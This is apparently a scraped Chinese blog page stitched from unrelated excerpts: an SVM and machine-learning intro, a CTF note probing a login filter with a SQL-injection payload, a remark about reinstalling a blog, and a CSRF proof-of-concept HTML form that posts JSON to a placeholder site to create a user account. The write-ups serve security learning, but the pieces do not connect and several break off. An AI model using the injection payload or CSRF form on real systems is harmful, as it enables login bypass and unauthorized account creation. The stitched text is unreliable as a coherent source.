本文是对于机器学习中SVM算法的一次学习记录,主要介绍SVM的原理和简单应用。通过自己实际操作去理解SVM。
机器学习并没有准确的权威定义,但作为机器学习领域的先驱Arthur Samuel将机器学习非正式定义为:“在不直接针对问题进行编程的情况下,赋予计算机学习能力的一个研究领域。”
因此,我们可以简单的理解为,机器学习这门学科所关注的问题是计算机程序如何随着经验的积累自动提高性能。
分类算法是数据挖掘同时也是机器学习的一个重要技术之一,其应用遍及社会各个领域。分类任务就是通过学习得到一个目标函数(通常也称作分类模型,即分类器),把每个属性集映射到一个预先定义的类标号。分类和回归都可以用于预测。和回归方法不同的是,分类的类标号是离散属性,而预测建模的回归的目标属性是连续的。
之前做的,整理笔记发出来记录一下
根据提示:
说明是一个注入题目,由于已经说了过滤了一切,所以需要看看到底过滤了什么。
提交:
username=' and or union select " < ( ) >-- #aa&password=
返回:
username:' and " < ( ) > aa
说明过滤了 or union select -- #
重新来审视这个题目,页面是一个登陆的页面,提示注入,出题者的意图其实就是让我们使用万能密码的方式进行登陆,登陆成功后,就是成功注入。但是经过上面的尝试可以知道,万能密码所需要的关键字:or union select已经被过滤了。这就需要根据实际情况进行测试了,我们可以猜测系统登陆的代码如下:
原来博客想搞一个HTTPS,结果各种调试不成功,把原来的博客搞的乱七八糟,于是就重新安装了一个,文章也就重新发了一遍。
这算不算是作呢~
今天遇到的,查了很多资料,发现这种形式的基本上没看到,圈子里某个师傅发了一个国外的链接,
参考了一下,最后成功构造poc。
0x02 POC
form提交post数据很简单,如下:
<html>
<head>
<title>This i a CSRF test!</title>
</head>
<form action="http://xxx.com/db/adds" method="post" enctype="text/plain" >
<input name='{"attributes":{"name":"test3@test.com","userName":"test1","password":"e10adc3949ba59abbe56e057f20f883e","role":"user","status":"enabled", "phone":""}}'type='hidden'>
<input type=submit>
</form>
</html>
但是这种方式存在缺陷,如下图: